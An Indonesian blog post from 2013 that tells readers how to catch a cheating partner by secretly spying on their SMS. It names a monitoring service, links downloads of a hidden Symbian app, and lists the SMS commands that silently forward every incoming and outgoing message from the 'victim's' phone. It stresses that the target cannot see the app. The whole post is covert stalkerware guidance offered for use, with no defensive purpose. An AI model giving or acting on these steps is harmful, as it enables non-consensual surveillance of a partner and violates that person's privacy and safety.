Latest Games :

Free Template »

Bookmark and Share
Home » » Cara Mengetahui Pacar Selingkuh

Cara Mengetahui Pacar Selingkuh

Senin, 07 Januari 2013 | 0 komentar

Anda curiga pacar anda selingkuh?,atau ternyata anda sudah mengetahuinya namun belum bisa atau susah di buktikan karena sang pacar menyembunyikan sesuatu di Hpnya?,saya asumsikan anda sedang mengalaminya dan anda penasaran ingin membuktikannya namun tidak bisa,kali ini saya akan berikan sebuah Tips trik Sms Spy,apaan tuh?,ya secara awam kita memata2i pacar kita melalui gerak geriknya saat mengirim maupun menerima SMS,Caranya??,udah gk sabar kan,mari kita simak,Cekidot..^^



Kekasih anda selingkuh?
Cara Pertama:
  • Menyadap sms lewat Internet dengan mendaftar ke www.bloove.com
  • trus download file agent.sisx s60
  • pasang di hp yang akan di sadap…!
  • Cara ini Gratis ^^
Cara Kedua

Cara yang kedua agak repot tapi manjur,Syaratnya:
  • HP adalah HP symbian. Baik HP kamu maupun HP korban.
  • HP Merek NOKIA
  • Memiliki aplikasi symbian. Baik HP kamu maupun HP korban.
dan Langkah-langkahnya:
  1. Kita akan menggunakan aplikasi smsanywherelite.sis sbg software penyadapnya. Bisa di download disini:http://rapidshare.com/files/199510713/Nemesis_SmsAnywhere_S60_2_0_v_1_4_1.SIS.htmlatau http://rapidlibrary.com/download_file_i.php?qq=sms%20anywhere&file=831044&desc=SMS+Anywhere+streetballer+.rar(Ukuran file hanya 14kb)
  2. Masukkan / install aplikasi symbian ini di HP kamu dan HP korban
  3. Begitu aplikasi ini diinstal, kamu tidak akan bisa melihat program tsb, begitu pula ikon aplikasi ini didalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Hal ini dikarenakan, aplikasi symbian ini belum mendukung GUI (Graphics User Interface). Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang korban tidak akan tahu kalau diponselnya telah dipasangi aplikasi tersebut. aplikasi symbian ini belum mendukung GUI (Graphics User Interface).
  4. Siapkan HP kamu dan HP korban
  5. Aktifkan aplikasi ini di ponsel korban dengan mengetik format sms :SA(spasi)(password)(spasi)ON
    Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketik: SA 123456 ON lalu kirim sms ini ke nomor ponsel kamu.
    Untuk mematikan / mengnonaktifkan aplikasi ini, ketik SA 123456 OFF lalu kirim ke nomor ponsel kamu.
  6. Langkah selanjutnya, Ketikkan sms ini di HP korban agar setiap sms yg masuk di HP korban akan selalu diteruskan ke HP kamu :SA(spasi)(password)(spasi)R1 misal SA 1234567 R1sms ini ke nomor ponsel kamu.
    Untuk mematikan fungsi ini, ganti parameter di belakang “R” menjadi nol. Sehingga menjadiSA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan :SA 1234567 S1 dan kirim ke nomer ponsel kamu.
    untuk mematikan fungsi ini, dengan mengirim sms SA 1234567 S0
  7. Nah sekarang, setiap korban menerima dan mengirim sms, kamu akan mendapat terusannya sama persis dengan sms aslinya… keren kan…!!!
    Selamat mencoba…!!!
Share this article :

Tidak ada komentar:

Poskan Komentar

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. trik internet indonesia - All Rights Reserved
Template Modify by Creating Website
Proudly powered by Blogger